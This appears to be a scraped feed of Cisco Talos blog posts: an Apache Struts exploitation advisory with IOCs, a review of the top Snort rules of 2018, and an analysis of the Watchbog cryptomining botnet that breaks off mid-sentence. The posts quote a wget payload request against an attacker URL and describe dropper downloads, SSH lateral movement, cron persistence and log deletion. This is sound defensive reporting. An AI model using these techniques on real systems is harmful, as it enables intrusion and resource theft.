cellpadding=\"0\" cellspacing=\"0\" class=\"tr-caption-container\" style=\"margin-left: auto; margin-right: auto; text-align: center;\"><tbody><tr><td style=\"text-align: center;\"><a href=\"https://2.bp.blogspot.com/-43pwp2mOpHE/WbHJQlk9djI/AAAAAAAABTo/cc3B9_qI3U4-sU6F-Eq3Rf2MsdlzqJB8wCLcBGAs/s1600/image2.png\" imageanchor=\"1\" style=\"margin-left: auto; margin-right: auto;\"><img border=\"0\" data-original-height=\"867\" data-original-width=\"1600\" height=\"346\" src=\"https://2.bp.blogspot.com/-43pwp2mOpHE/WbHJQlk9djI/AAAAAAAABTo/cc3B9_qI3U4-sU6F-Eq3Rf2MsdlzqJB8wCLcBGAs/s640/image2.png\" width=\"640\" /></a></td></tr><tr><td class=\"tr-caption\" style=\"text-align: center;\">Example of in the wild exploitation</td></tr></tbody></table>Other exploitation attempts have been identified where Talos believes another threat actor appears to be exploiting the vulnerability for a different purpose. An example of the web requests found in the exploitation attempts can be found below.<br /><blockquote class=\"tr_bq\"><string>wget</string><string>hxxp://st2buzgajl.alifuzz[.]com/052</string></blockquote>Unfortunately, we were unable to retrieve the potentially malicious file that was being served at this particular location. If the previous Struts vulnerability is any indicator, the payloads could vary widely and encompass threats such as DDoS bots, spam bots, and various other malicious payloads.<br /><br /><h3 id=\"h.1teoyjf4qh2n\">IOCs</h3>IP Addresses Observed: <br /><ul><li>188.120.246[.]215</li><li>101.37.175[.]165</li><li>162.158.182[.]26</li><li>162.158.111[.]235</li><li>141.101.76[.]226</li><li>141.101.105[.]240</li></ul>Domains Contacted:<br /><ul><li>wildkind[.]ru</li><li>st2buzgajl.alifuzz[.]com</li></ul>Commonly Used Path:<br /><ul><li>/struts2-rest-showcase/orders/3</li></ul><h3 id=\"h.yv6ldyfuky10\">Mitigation</h3>Apache has released a new version of Struts that resolves this issue. If you believe that you have a potentially vulnerable version of Apache struts there are two options: upgrade to Struts 2.5.13 / Struts 2.3.34 or remove the REST plugin if it's not actively being used. Instructions to achieve this are provided as part of the <a href=\"https://cwiki.apache.org/confluence/display/WW/S2-052\">security bulletin</a> and should be reviewed and tested before applying in a production environment. In the event it's not possible to upgrade or remove the REST plugin, limiting it to server normal pages and JSONs may help limit the risk the compromise.<br /><h3 id=\"h.dp04v9qgtelp\">Conclusion</h3>This is the latest in a long line of vulnerabilities that are exposing servers to potential exploitation. In today's threat landscape a lot of attention is paid to endpoint systems being compromised, and with good reason, as it accounts for the majority of the malicious activity we observe on a daily basis. However, that does not imply that patching of servers should not be an extremely high priority. These types of systems, if compromised, can potentially expose critical data and systems to adversaries.<br /><br />The vulnerability is yet another example of how quickly miscreants will move to take advantage of these types of issues. Within 48 hours of disclosure we were seeing systems activity exploiting the vulnerability. To their credit the researchers disclosed the vulnerability responsibly and a patch was available before disclosure occurred. However, with money at stake bad guys worked quickly to reverse engineer the issue and successfully develop exploit code to take advantage of it. In today's reality you no longer have weeks or months to respond to these type of vulnerabilities, it's now down to days or hours and every minute counts. Ensure you have protections in place or patches applied to help prevent your enterprise from being impacted.<br /><h3 id=\"h.myaej86w3pvi\">Coverage</h3>Talos has released the following Snort rule to address this vulnerability. Please note that additional rules may be released at a future date and current rules are subject to change pending additional vulnerability information. Firepower customers should use the latest update to their ruleset by updating their SRU. Open Source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on <a href=\"https://snort.org/products\">Snort.org</a>.<br /><br />Snort Rule: 44315<br /><br /><div class=\"separator\" style=\"clear: both; text-align: center;\"><a href=\"https://2.bp.blogspot.com/-U6SRWeSjeTM/WbHJZe1FSrI/AAAAAAAABTs/N-Z3A0kgDZUf0j3-p0b7-PSV7hVX3TZMACLcBGAs/s1600/image1.png\" imageanchor=\"1\" style=\"clear: left; float: left; margin-bottom: 1em; margin-right: 1em;\"><img border=\"0\" data-original-height=\"1341\" data-original-width=\"1600\" height=\"268\" src=\"https://2.bp.blogspot.com/-U6SRWeSjeTM/WbHJZe1FSrI/AAAAAAAABTs/N-Z3A0kgDZUf0j3-p0b7-PSV7hVX3TZMACLcBGAs/s320/image1.png\" width=\"320\" /></a></div><br /><br />Network Security appliances such as <a href=\"https://www.cisco.com/c/en/us/products/security/firewalls/index.html\">NGFW</a>, <a href=\"https://www.cisco.com/c/en/us/products/security/intrusion-prevention-system-ips/index.html\">NGIPS</a>, and <a href=\"https://meraki.cisco.com/products/appliances\">Meraki MX</a> can detect malicious activity associated with this threat.<br /><br /><div class=\"feedflare\">\n<a href=\"http://feeds.feedburner.com/~ff/feedburner/Talos?a=nXfzZg_yH_w:t_cz9fDBuvo:yIl2AUoC8zA\"><img src=\"http://feeds.feedburner.com/~ff/feedburner/Talos?d=yIl2AUoC8zA\" border=\"0\"></img></a>\n</div><img src=\"http://feeds.feedburner.com/~r/feedburner/Talos/~4/nXfzZg_yH_w\" height=\"1\" width=\"1\" alt=\"\"/>", "cvss3": {}, "published": "2017-09-07T15:42:00", "type": "talosblog", "title": "Another Apache Struts Vulnerability Under Active Exploitation", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2017-5638", "CVE-2017-9805"], "modified": "2017-09-08T15:49:47", "id": "TALOSBLOG:DB8F26399F12B0F9B9309365CB42D9BB", "href": "http://feedproxy.google.com/~r/feedburner/Talos/~3/nXfzZg_yH_w/apache-struts-being-exploited.html", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-02-12T15:23:07", "description": "_This blog post was authored by Benny Ketelslegers of Cisco Talos_ \n_ \n_The cybersecurity field shifted quite a bit in 2018. With the boom of cryptocurrency, we saw a transition from ransomware to [cryptocurrency miners](<https://blog.talosintelligence.com/2018/01/malicious-xmr-mining.html>). Talos researchers identified APT campaigns including [VPNFilter](<https://blog.talosintelligence.com/2018/05/VPNFilter.html>), predominantly affecting small business and home office networking equipment, as well as [Olympic Destroyer](<https://blog.talosintelligence.com/2018/02/olympic-destroyer.html>), apparently designed to disrupt the Winter Olympics. \n \nBut these headline-generating attacks were only a small part of the day-to-day protection provided by security systems. In this post, we'll review some of the findings created by investigating the most frequently triggered SNORT\u24c7 rules as reported by [Cisco Meraki](<https://meraki.cisco.com/>) systems. These rules protected our customers from some of the most common attacks that, even though they aren't as widely known, could be just as disruptive as something like Olympic Destroyer. Snort is a free, open-source network intrusion prevention system. Cisco Talos provides new rule updates to Snort every week to protect against software vulnerabilities and the latest malware. \n \n \n\n\n### Top 5 Rules\n\n \nSnort rules trigger on network behavior ranging from attempts to probe networked systems, attempts at exploiting systems, to detecting known malicious command and control traffic. Each rules detects specific network activity, and each rules has a unique identifier. This identifier is comprised of three parts. The Generator ID (GID), the rule ID (SID) and revision number. The GID identifies what part of Snort generates the event. For example, \"1\" indicates an event has been generated from the text rules subsystem. The SID uniquely identifies the rule itself. You can search for information on SIDs via the search tool on the [Snort website](<https://www.snort.org/>). The revision number is the version of the rule. Be sure to use the latest revision of any rule. \n \nSnort rules are classified into different classes based on the type of activity detected with the most commonly reported class type being \"policy-violation\" followed by \"trojan-activity\" and \"attempted-admin.\" Some less frequently reported class types such as \"attempted user\" and \"web-application-attack\" are particularly interesting in the context of detecting malicious inbound and outbound network traffic. \n \nCisco Meraki-managed devices protect clients networks and give us an overview of the wider threat environment. These are the five most triggered rules within policy, in reverse order. \n \n\n\n#### No. 5: 1:43687:2 \"suspicious .top dns query\"\n\n \nThe .top top-level domain extension is a generic top level domain and has been observed in malware campaigns such as the [Angler exploit kit](<https://blog.talosintelligence.com/2016/03/angler-slips-hook.html>) and the [Necurs botnet](<https://blog.talosintelligence.com/2018/01/the-many-tentacles-of-necurs-botnet.html>). This top-level domain can be bought as cheap as 1 USD and is the reason it is very popular with cybercriminals for their malware and phishing campaigns. \n \nThis signature triggers on DNS lookups for .top domains. Such a case doesn\u2019t necessarily mean that such a lookup is malicious in nature, but it can be a useful indicator for suspicious activity on a network. A sharp increase in this rule triggering on a network should be investigated as to the cause, especially if a single device is responsible for a large proportion of these triggers. \n \n\n\n#### No. 4: 1:41978:5 \"Microsoft Windows SMB remote code execution attempt\"\n\n \nIn May 2017, a [vulnerability](<https://www.us-cert.gov/ncas/current-activity/2017/03/16/Microsoft-SMBv1-Vulnerability>) in SMBv1 was published that could allow remote attackers to execute arbitrary code via crafted packets. This led to the outbreak of the network worms [Wannacry](<https://blog.talosintelligence.com/2017/05/wannacry.html>) and [Nyetya](<https://blog.talosintelligence.com/2017/06/worldwide-ransomware-variant.html>) in 2017. Although it did not make our top five rules in 2017, it seems there was still a lot scanning or attempts to exploit this vulnerability in 2018. This shows the importance of network defenses and patching management programs as often as possible. \n \nOrganizations should ensure that devices running Windows are fully patched. Additionally, they should have SMB ports 139 and 445 blocked from all externally accessible hosts. \n \n\n\n#### No. 3: 1:39867:4 \"Suspicious .tk dns query\"\n\n \nThe .tk top-level domain is owned by the South Pacific territory of Tokelau. The domain registry allows for the registration of domains without payment, which leads to the .tk top level domain being one of the most prolific in terms of the number of domain names registered. However, this free registration leads to .tk domains frequently being abused by attackers. \n \nThis rule triggers on DNS lookups for .tk domains. Such a case doesn't necessarily mean that such a lookup is malicious in nature, but it can be a useful indicator for suspicious activity on a network. A sharp increase in this rule triggering on a network should be investigated as to the cause, especially if a single device is responsible for a large proportion of these triggers. \n \nOther, similar rules detecting DNS lookups to other rarely used top-level domains such as .bit, .pw and .top also made into our list of top 20 most triggered rules. \n \n\n\n#### No. 2: 1:35030:1 & 1:23493:6 \"Win.Trojan.Zeus variant outbound connection\"\n\n \nHistorically, one of the most high-profile pieces of malware is [Zeus/Zbot](<https://talosintelligence.com/zeus_trojan>), a notorious trojan that has been employed by botnet operators around the world to steal banking credentials and other personal data, participate in click-fraud schemes, and likely numerous other criminal enterprises. It is the engine behind notorious botnets such as Kneber, which made headlines worldwide. \n \nIn the beginning of 2018, Talos observed a [Zeus variant](<https://blog.talosintelligence.com/2018/01/cfm-zeus-variant.html>) that was launched using the official website of Ukraine-based accounting software developer Crystal Finance Millennium (CFM). \n \nThis vector is similar to the attack outlined by Talos in the Nyetya and companion MeDoc blog post. Ukrainian authorities and businesses were alerted by local security firm (ISSP) that another accounting software maker had been compromised. CFM's website was being used to distribute malware that was retrieved by malware downloaders attached to messages associated with a concurrent spam campaign. \n \nEver since the source code of Zeus leaked in 2011, we have seen various variants appear such as [Zeus Panda](<https://blog.talosintelligence.com/2017/11/zeus-panda-campaign.html>) which poisoned Google Search results in order to spread. \n \n\n\n#### No. 1: 1:46237:1 \"PUA-OTHER Cryptocurrency Miner outbound connection attempt\" & \"1:45549:4 PUA-OTHER XMRig cryptocurrency mining pool connection attempt\"\n\n \nOver the past year, we have seen a seismic shift in the threat landscape with the explosive growth of malicious cryptocurrency mining. Cisco Talos created various rules throughout the year to combat Cryptocurrency mining threats and this rule deployed in early 2018, proved to be the number 1 showing the magnitude of attacks this rule detected and protected against. This threat has spread across the internet like wildfire and is being delivered through multiple vectors including email, web, and active exploitation. It is no surprise that these two combined rules are the most often observed triggered Snort rule in 2018. \n \nCryptocurrency mining can use up a considerable amount of computing power and energy that would otherwise be incredibly valuable to any organization. \n \nFor an overview of all related snort rules and full details of all the methods and technologies Cisco Talos uses to thwart cryptocurrency mining, download the Talos whitepaper [here](<https://www.talosintelligence.com/resources/59>). \n \n\n\n \n\n\n[](<https://2.bp.blogspot.com/-XcaLfnec00Q/XFsp6eXg_rI/AAAAAAAAACI/fxssE2sbuesqNKpMzg1Lbqnod5iU9u4oQCLcBGAs/s1600/012419-Snort-Sigs-Blog-outbound-connection-attempt.png>)\n\n \n\n\n### INBOUND and OUTBOUND\n\n \nNetwork traffic can cross an IDS from external to internal (inbound), from the internal to external (outbound) interfaces or depending on the architecture of your environment the traffic can avoid being filtered by a firewall or inspected by an IPS/IDS device; this will generally be your local/internal traffic on the same layer2 environment. An alert may be triggered and logged for any of these scenarios depending on the rulesets in place and the configuration of your sensors. \n \n \nOutbound rules were triggered during 2018 much more frequently than internal, which in turn, were more frequent than inbound with ratios of approximately 6.9 to 1. The profile of the alerts are different for each direction. Inbound alerts are likely to detect traffic that can be attributed to attacks on various server-side applications such as web applications or databases. Outbound alerts are more likely to contain detection of outgoing traffic caused by malware infected endpoints. \n \nLooking at these data sets in more detail gives us the following: \n \n\n\n[](<https://4.bp.blogspot.com/-p8YZlzLMQXE/XFsqAliaQcI/AAAAAAAAACM/XhgffiU6hUYdyd21OCDF_QJAEpBKYYn1gCLcBGAs/s1600/012419-Snort-Sigs-Blog-inbound-signature-types.png>)\n\n \nWhile trojan activity was rule type we saw the most of in 2018, making up 42.5 percent of all alerts, we can now see \"Server-Apache\" taking the lead followed by \"OS-Windows\" as a close second. \n \nThe \"Server-Apache\" class type covers Apache related attacks which in this case consisted mainly of 1:41818 and 1:41819 detecting the Jakarta Multipart parser vulnerability in Apache Struts ([CVE-2017-5638](<https://blog.talosintelligence.com/2017/03/apache-0-day-exploited.html>)). Later in 2017, a second Apache Struts vulnerability was discovered under CVE-2017-9805, making this rule type the most observed one for 2018 IDS alerts. \n \n\"OS-Windows\" class alerts were mainly triggered by Snort rule 1:41978, which covers the SMBv1 vulnerability exploited by [Wannacry](<https://blog.talosintelligence.com/2017/05/wannacry.html>) and [NotPetya](<https://blog.talosintelligence.com/2017/06/worldwide-ransomware-variant.html>) (MS-17-010). \n \nThe \"Browser-plugins\" class type covers attempts to exploit vulnerabilities in browsers that deal with plugins to the browser. (Example: ActiveX). Most activity for 2018 seems to consist of Sid 1:8068 which is amongst others linked to the \"Microsoft Outlook Security Feature Bypass Vulnerability\" (CVE-2017-11774). \n\n\n \n\n\n[](<http://2.bp.blogspot.com/-lKN6ktW9YRg/XF2L_nSsNfI/AAAAAAAAAVw/6G830jVQQA8On0TJLRDs0enzFolMyl-0QCK4BGAYYCw/s1600/012419-Snort-Sigs-Blog-outbound-signature-types.png>)[](<http://1.bp.blogspot.com/-hrZUBsvx4sw/XF2Py-Y-_-I/AAAAAAAAAWI/TU0EcE5KCNwNtIznDY93Bt6Hjn0WCih4QCK4BGAYYCw/s1600/012419-Snort-Sigs-Blog-outbound-signature-types.png>)\n\n \n \nFor outbound connections, we observed a large shift toward the \"PUA-Other\" class, which is mainly a cryptocurrency miner outbound connection attempt. Cryptomining can take up a large amount of valuable enterprise resources in terms of electricity and CPU power. To see how to block Cryptomining in an enterprise using Cisco Security Products, have a look at our [w](<https://blog.talosintelligence.com/2018/07/blocking-cryptomining.html>)[hitepaper](<https://blog.talosintelligence.com/2018/07/blocking-cryptomining.html>) published in July 2018. \n \nThe most frequently triggered rules within the \"Malware-CNC\" rule class are the Zeus trojan activity rules discussed above. \n\n\n### Conclusion\n\n \n\n\nSnort rules detect potentially malicious network activity. Understanding why particular rules are triggered and how they can protect systems is a key part of network security. Snort rules can detect and block attempts at exploiting vulnerable systems, indicate when a system is under attack, when a system has been compromised, and help keep users safe from interacting with malicious systems. They can also be used to detect reconnaissance and pre-exploitation activity, indicating that an attacker is attempting to identify weaknesses in an organization's security posture. These can be used to indicate when an organization should be in a heightened state of awareness about the activity occurring within their environment and more suspicious of security alerts being generated. \n \nAs the threat environment changes, it is necessary to ensure that the correct rules are in place protecting systems. Usually, this means ensuring that the most recent rule set has been promptly downloaded and installed. As shown in the Apache Struts vulnerability data, the time between a vulnerability being discovered and exploited may be short. \n \nOur most commonly triggered rule in 2018: 1:46237:1 \"PUA-OTHER Cryptocurrency Miner outbound connection attempt\" highlights the necessity of protecting IoT devices from attack. Malware such as Mirai seeks to compromise these systems to use them as part of a botnet to put to use for further malicious behaviour. Network architectures need to take these attacks into consideration and ensure that all networked devices no matter how small are protected. \n \nSecurity teams need to understand their network architectures and understand the significance of rules triggering in their environment. For full understanding of the meaning of triggered detections it is important for the rules to be open source. Knowing what network content caused a rule to trigger tells you about your network and allows you to keep abreast of the threat environment as well as the available protection. \n \nAt Talos, we are proud to maintain a set of open source Snort rules and support the thriving community of researchers contributing to Snort and helping to keep networks secure against attack. We're also proud to contribute to the training and education of network engineers through the Cisco Networking Academy, as well through the release of additional open-source tools and the detailing of attacks on our blog. \n \nYou can [subscribe](<https://www.snort.org/products>) to Talos' newest rule detection functionality for as low as $29 a year with a personal account. Be sure and see our business pricing for Snort as well [here](<https://snort.org/products%23rule_subscriptions>).", "cvss3": {}, "published": "2019-02-06T08:19:00", "type": "talosblog", "title": "2018 in Snort Rules", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2017-11774", "CVE-2017-5638", "CVE-2017-9805"], "modified": "2019-02-12T14:15:53", "id": "TALOSBLOG:DAD87115458AF1FB5EDF5A2BB21D8AB9", "href": "http://feedproxy.google.com/~r/feedburner/Talos/~3/6rupY-noy3s/2018-in-snort-signatures.html", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-09-11T16:31:25", "bulletinFamily": "blog", "cvelist": ["CVE-2018-1000861"], "description": "[](<https://1.bp.blogspot.com/-T6tAdLkCVaQ/XWY957W13BI/AAAAAAAABSk/k4c65smKUDc6_ojm0cR3sGDMB3jvU1LagCLcBGAs/s1600/image5.png>)\n\n_By [Luke DuCharme](<https://twitter.com/_nTr0py>) and [Paul Lee](<https://twitter.com/paulleeio>)._\n\n \n\n\n## What Happened?\n\n \nCisco Incident Response (CSIRS) recently responded to an incident involving the Watchbog [cryptomining](<https://blog.talosintelligence.com/2018/01/malicious-xmr-mining.html>) botnet. The attackers were able to exploit [CVE-2018-1000861](<https://jenkins.io/security/advisory/2018-12-05/>) to gain a foothold and install the [Watchbog](<https://www.bleepingcomputer.com/news/security/bluekeep-scanner-discovered-in-watchbog-cryptomining-malware/>) malware on the affected systems. \n \nThis Linux-based malware relied heavily on Pastebin for command and control (C2) and operated openly. CSIRS gained an accurate understanding of the attacker's intentions and abilities on a customer's network by analyzing the various Pastebins. As the investigation progressed, CSIRS identified and de-obfuscated multiple pastes using artifacts left on compromised hosts. \n \nThere were some attempts at obfuscation, such as base64 encoding URLs and Pastebins, but the attack was still relatively simple to uncover - this attacker did not practice particularly strong operational security. \n \nThe attackers behind Watchbog claimed to be providing a service by identifying security vulnerabilities and aiding the organization by exploiting said weaknesses before any \"real\" hackers could do so. During the investigation, Cisco IR found signs of hosts becoming a part of a separate botnet around the time of the Watchbog activity. This raises serious doubts about the \"positive\" intentions of this adversary. Below is a message left on a compromised system by the adversary: \n \n \n\n\n[](<https://1.bp.blogspot.com/-ujTm3bnl6Y4/XXkIAdu_6hI/AAAAAAAACks/aoCA1ZLep9wEg5GhKjKVvWZ1K1xeMaqeQCLcBGAsYHQ/s1600/image5.png>)\n\n \n \n\n\n## What does Watchbog do? \n\n \nThe Watchbog botnet mines Monero cryptocurrency for its owners. While researching our variant we came across a [post](<https://www.alibabacloud.com/blog/return-of-watchbog-exploiting-jenkins-cve-2018-1000861_594798>) by Alibaba Cloud Security that provides some insights into Watchbog. This post coincided with our findings as we found an installation script that performs the following activities. \n \nFirst the installation script checks for running processes matching other cryptocurrency miners. If the system was previously configured to mine cryptocurrency, the installation script would terminate their execution using the kill command: \n \n\n\n[](<https://1.bp.blogspot.com/-A77Z058CSas/XXkIGxjwNUI/AAAAAAAACkw/LU4PzjqWeuUFTzi0ie-5HiUI9aqAvbX0gCLcBGAsYHQ/s1600/image19.png>)\n\n \n \n \nThe script then uses the touch command to determine its capability to write to various directories on the filesystem. \n \n\n\n[](<https://1.bp.blogspot.com/-hZreiq7fNuc/XXkIML9U97I/AAAAAAAACk0/3sYIcbzDfqwKO7yulMTA8cCO0AztQ9y2QCLcBGAsYHQ/s1600/image10.png>)\n\n \n \n \nIt also checks the architecture of the system to determine if it is executing on a 32-bit or 64-bit operating system and then makes three attempts to download and install a '[kerberods](<https://www.securityweek.com/jenkins-vulnerability-exploited-deliver-kerberods-malware>)' dropper using wget or curl. \n \n\n\n[](<https://1.bp.blogspot.com/-HPsroOq2qhA/XXkIQfB4zkI/AAAAAAAACk4/rsX2J_AT4QMKum9HYVpGSZllcOgdnJiDgCLcBGAsYHQ/s1600/image6.png>)\n\n \n \nDepending on permissions, the kerberods dropper is saved to one of the following directories: \n \n\n\n * The current working directory\n * /usr/bin\n * /usr/libexec\n * /usr/local/bin\n * /tmp\n * /usr/sbin\n \n \nThe script also retrieves the contents of a Pastebin URL containing a Monero wallet ID and mining information. CSIRS verified this as the same wallet ID as the one used by the attacker referenced in the Alibaba cloud post referenced earlier. \n \n\n\n[](<https://1.bp.blogspot.com/-h-5OOiEvD6E/XXkIVOCPzDI/AAAAAAAACk8/w64pGCY_Lu8_uETE9TIwJPdcz0U1BeqBACLcBGAsYHQ/s1600/image15.png>)\n\n \n \nThough the Pastebin URL in the previous screenshot is no longer accessible, the next step in the infection process is to download the cryptocurrency miner. We identified a script that 'kerberods' likely runs to reach out to GitHub to install the [XMR-Stak](<https://github.com/fireice-uk/xmr-stak>) Monero miner. \n \nThe main part of the script checks to see if a process called 'watchbog' is running. \n \n\n\n[](<https://1.bp.blogspot.com/-VwVkn4qRI_o/XXkIaqorPsI/AAAAAAAAClA/k_fDNgqtyPcLigl06zAGz_G7r8BqDgW2wCLcBGAsYHQ/s1600/image14.png>)\n\n \n \nIf the 'watchbog' process is not detected, the 'testa' or 'download' functions are called to install the version of the miner that's compatible with the host operating system and architecture and execute it to begin the mining process. \n \n\n\n[](<https://1.bp.blogspot.com/-by3LDE47GAs/XXkIfunS68I/AAAAAAAAClI/VPfDareDVrU8sqDw3zCfPrePM6I4GqaRwCLcBGAsYHQ/s1600/image16.png>)\n\n \n \n\n\n### 'Testa' function\n\n \nAs previously mentioned, the 'testa' function may be called to facilitate the infection process. Below is the code associated with this function. This code is responsible for writing the various configuration data used by the mining software. The function declares three variables and assigns base64 encoded data to each of them. \n \n\n\n[](<https://1.bp.blogspot.com/-TiGg3jydpBE/XXkIl9UjzpI/AAAAAAAAClU/UlvIXZKQwNscT8a8rOTwe9jtw54KI046wCLcBGAsYHQ/s1600/image18.png>)\n\n \n \nThe base64 encoded data is then decoded and written to various files. \n \n\n\n[](<https://1.bp.blogspot.com/-0T8gl-_prkE/XXkIqsy8W3I/AAAAAAAAClc/jxingEGh9NMTPJCXXZ5gQfhlQ9zOUZzbACLcBGAsYHQ/s1600/image17.png>)\n\n \n \nThe base64 encoded values correspond to the following: \n \n\n\n * St_64: This variable contains the URL of the Github repository that hosts the XMR-Stak mining client.\n * hXXps://github[.]com/fireice-uk/xmr-stak/releases/download/2.10.3/xmr-stak-linux-2.10.3-cpu.tar.xz \n \n \n\n\n * con_url: This variable contains the Pastebin URL that is used to host the configuration file for the mining client. \n * hXXps://pastebin[.]com/raw/YJH8sWr\n \n \n\n\n * Cpu_url: This variable contains an additional Pastebin URL. During our investigation the Pastebin URL was no longer accessible, but likely contains an additional configuration file to be used by the mining client.\n * hXXps://pastebin[.]com/raw/irzk5mSh\n \n \n\n\n * poo_url:This variable contains an additional Pastebin URL. During our investigation the Pastebin URL was no longer accessible, but likely contains an additional configuration file to be used by the mining client.\n * hXXps://pastebin[.]com/raw/aJkbTx6Y\n \n \nThe script then starts the Watchbog process and deletes the text file after downloading the encoded Pastebins as a text file and giving it execution permissions. The following screenshot shows the configuration file that is referenced by the con_url variable in the 'testa' function. \n \n\n\n[](<https://1.bp.blogspot.com/-xSeuN5oL4aY/XXkIxPOeUEI/AAAAAAAAClk/N635X8ceQ0IdzDY7GJTclbF4rBLEwDYvQCLcBGAsYHQ/s1600/image12.png>)\n\n \n \n\n\n### 'download' function\n\n \nThe following code is associated with the 'download' function referenced by the installation script previously described. Similar to what was described in the 'testa' function, it contains three declared variables with base64 encoded assignments. \n \n\n\n[](<https://1.bp.blogspot.com/-aqSmprNOZXk/XXkI2aAmTJI/AAAAAAAAClo/vtEn5t-UvDUoeNnUn4OPSW9fh8iooJYPwCLcBGAsYHQ/s1600/image13.png>)\n\n \n \nThese base64 encoded strings correspond to the following: \n \n\n\n * mi_64: This variable contains the Github URL that hosts the XMrig monero mining client. \n * hXXps://github[.]com/xmrig/xmrig/releases/download/v2.14.1/xmrig-2.14.1-xenial-x64.tar.gz\n \n \n\n\n * mi_32: This variable contains a Pixeldrain URL. During our investigation the URL was no longer accessible. \n * hXXps://pixeldrain[.]com/api/file/ZuVWceWG\n \n \n\n\n * der_ke: This variable contains a Pastebin URL. The URL was used to host a file containing the attacker(s) Monero Wallet ID for the miner to use. This Wallet ID is used to facilitate payment to the attacker. All Monero successfully mined by clients under the attacker's control will transfer the Monero to the Wallet ID specified in this file. The same wallet is included in the Alibaba Cloud post mentioned earlier.\n * hXXps://pastebin[.]com/raw/hURdMBLd\n \n \nThe download function then writes the contents retrieved from the specified URLs to various file locations. It then determines the architecture of the system and installs the appropriate mining client and executes it to initiate the mining process. \n \n\n\n[](<https://1.bp.blogspot.com/-3AAGL4Enxgc/XXkI8suvJoI/AAAAAAAAClw/wOHkv6rtfYMf9hYBUf_qJJDNon6L4ixNgCLcBGAsYHQ/s1600/image2.png>)\n\n \n \n \nThe following screenshot contains the contents of the Monero wallet configuration associated with the der_ke variable in the 'download' function described earlier. It specifies the configuration parameters that will be used by the mining client, including the Wallet ID, mining pool URL, and other parameters that can be used to control CPU usage, logging, etc. \n \n\n\n[](<https://1.bp.blogspot.com/-f3DJaaFacSo/XXkJB_E7xYI/AAAAAAAACl0/DUEfC02BOTcFYExE4hGsDqyBd8Ek6ZuIgCLcBGAsYHQ/s1600/image8.png>)\n\n \n \n\n\n## Lateral movement via SSH\n\n \nCSIRS identified that the adversary was using SSH to spread laterally. Although local logs were unavailable, we were able to use network logs to gain an understanding of how the malware was spreading. As we viewed the logs, it was easy to determine Watchbog's lateral movement mechanism because they were generating a large amount of SSH traffic. This could have been easily detected using internal traffic flow monitoring, such as with StealthWatch Cloud or other netflow-monitoring capability. \n \nThe following Bash script was used to facilitate the lateral movement process. It retrieves the contents of the known_hosts file on the infected system and then attempts to SSH into those systems. It also checks for the existence of SSH keys and leverages them to authenticate to the systems in the known_hosts file. If successful, it will retrieve the contents of the Pastebin URL previously described and initiate the infection process. \n \n\n\n[](<https://1.bp.blogspot.com/-5_xBPPopbZI/XXkJHnWUv6I/AAAAAAAACl8/s2tHmsrtZzc4gFcIFC2qNU6x8WBtCV5EACLcBGAsYHQ/s1600/image3.png>)\n\n \n \n \n\n\n## Lateral movement via Jenkins and Redis servers\n\n \nIn addition to leveraging SSH for lateral movement, the Watchbog adversary also attempted to leverage a Python script that scans for open Jenkins and Redis ports on the host's subnet. If the script finds any vulnerable servers, it attempts to use the curl or wget commands to retrieve a payload from Pastebin and execute it on the target. \n \nBased on the following string on line 71, the script targets CVE-2018-1000861, a vulnerability in the Staple web framework for versions up to Jenkins 2.138.1 or 2.145 which handles HTTP requests. It can provide attackers with RCE through particularly crafted URLs. A [post](<https://devco.re/blog/2019/01/16/hacking-Jenkins-part1-play-with-dynamic-routing-en/>) by Orange Tsai shows how to exploit this vulnerability by using cross reference objects to bypass ACL policy. \n \n\n\n[](<https://1.bp.blogspot.com/-3TxIe0-nZsM/XXkJM986stI/AAAAAAAACmA/FgUyo8tO6YIEaZio5VFrJdNgEZtHrpA7gCLcBGAsYHQ/s1600/image7.png>)\n\n \n \nThough the pastes accessed in the script were no longer available, we believe the payload was the installation script for the XMR-Stak miner previously described. The following Python script is also downloaded and executed from the XMR-Stak miner script described above in a function called 'party.' \n \n\n\n[](<https://1.bp.blogspot.com/-yYGvHmNwIzs/XXkJRnRvBjI/AAAAAAAACmI/E_GktVykecAKBOY6JBO9E0arUg6-rkkPwCLcBGAsYHQ/s1600/image4.png>)\n\n \n \nAs can be seen above, the payload variable contains a base64 encoded blob which is then decoded and written to the /tmp directory and executes it. This base64 encoded blob contains a Pastebin URL (hXXps://pastebin[.]com/raw/DzgYb9mu) which was used to host the following Python script. The Python script is used to facilitate the exploitation of the aforementioned vulnerability and initiate the infection process. The following screenshots are associated with this Python script. \n \n\n\n[](<https://1.bp.blogspot.com/-ffsJuwLdgf4/XXkJXUd3YgI/AAAAAAAACmQ/H4hum_c5VLwooskH2NtFwGmRRUGVB8qjwCLcBGAsYHQ/s1600/image21.png>)\n\n \n\n\n[](<https://1.bp.blogspot.com/-e3bawStVKtA/XXkJcurJEqI/AAAAAAAACmY/kwJwp-GBGAA1fwJDVQLoIGSl0cxhp_pOQCLcBGAsYHQ/s1600/image1.png>)\n\n \n \n\n\n[](<https://1.bp.blogspot.com/-sMDwBEFIxqI/XXkJiHMLZlI/AAAAAAAACmg/FpktKT_qR9geHhpanXh4ElHHfWgwHu6agCLcBGAsYHQ/s1600/image20.png>)\n\n \n \n \n\n\n## Persistence\n\n \nWatchbog's main persistence mechanism appears to have been using cron jobs. Below is the 'system' function from the 'kerberods' installation script which ensures the dropper will call out to Pastebins every hour for new information. The below screenshot shows the way that Watchbog configures the cron jobs responsible for achieving persistence on infected systems. \n \n\n\n[](<https://1.bp.blogspot.com/-0tfsLV-3M3U/XXkJoO47SsI/AAAAAAAACmk/Zomf6H49VL8zFtlb6NEuLWVMc2ZLlhfaQCLcBGAsYHQ/s1600/image11.png>)\n\n \n \nIn a post by Renato Marinho from Morphus Labs, he mentions a very interesting way 'kerberods' achieves persistence as well. If it has root privileges, it will download and load a library into the operating system which hooks parts of Glibc to modify Glibc's behavior. The post also specifies that the hooks allow the miner to run as anyone (including root) and also obfuscates the network connection to the mining pool as well as the Redis/Jenkins server scans. \n \n\n\n## Covering their tracks\n\n \nEvidence deletion has been identified in previous Watchbog variants. The Watchbog variant in our incident continued this trend. Evidence deletion was performed in a clear manner with files and logs being deleted or overwritten. The evidence 